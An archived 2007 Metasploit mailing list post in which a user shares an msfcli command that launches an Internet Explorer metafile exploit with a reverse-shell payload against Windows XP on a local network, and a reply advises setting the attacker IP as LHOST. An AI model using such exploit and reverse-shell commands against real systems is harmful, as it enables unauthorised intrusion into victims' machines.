Metasploit mailing list archives

A little confused. :P

From: one.miguel at gmail.com (one.miguel at gmail.com)
Date: Sun, 13 May 2007 20:25:58 -1000

You probably need to change the "0.0.0.0" to your attacker IP address.

On 5/13/07, Paris Jones <arckeda at yahoo.com> wrote:


Hey, I am not sure if I am doing this right, I am trying to Exploit IE
seven on
Windows XP in my local network connect with meterpreter.
My current command is:


./msfcli ie_xp_pfv_metafile HTTPPORT=8080 PAYLOAD=win32_reverse
 LHOST=0.0.0.0 LPORT=4321 E


I see:

[*] Starting Reverse Handler.
[*] Waiting for connections to http://192.168.1.10:8080/


If I connect to 192.168.1.10:8080, I will receive a "Please wait." message
on the client machine, and on attacker, I will get:

[*] HTTP Client connected from 192.168.1.100:4687, sending 1556 bytes
of payload...

Then nothing else....  Am I supposed to be connecting on 4321?  If I do,
 on the victim machine I get a large amount of text that looks kind of
like a file
and nothing happens on the attacking machine.  I don't think I am doing
this right,
and any help would be appreciated, thanks in advanced.


-ARCKEDA



------------------------------
Sick sense of humor? Visit Yahoo! TV's Comedy with an Edge
<http://us.rd.yahoo.com/evt=47093/*http://tv.yahoo.com/collections/222>to
see what's on, when.

-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://mail.metasploit.com/pipermail/framework/attachments/20070513/63146048/attachment.htm>

Current thread:

A little confused. :P Paris Jones (May 13)
- A little confused. :P one.miguel at gmail.com (May 13)
- <Possible follow-ups>
- A little confused. :P Paris Jones (May 14)
  - A little confused. :P one.miguel at gmail.com (May 14)
- A little confused. :P Paris Jones (May 14)
  - A little confused. :P one.miguel at gmail.com (May 14)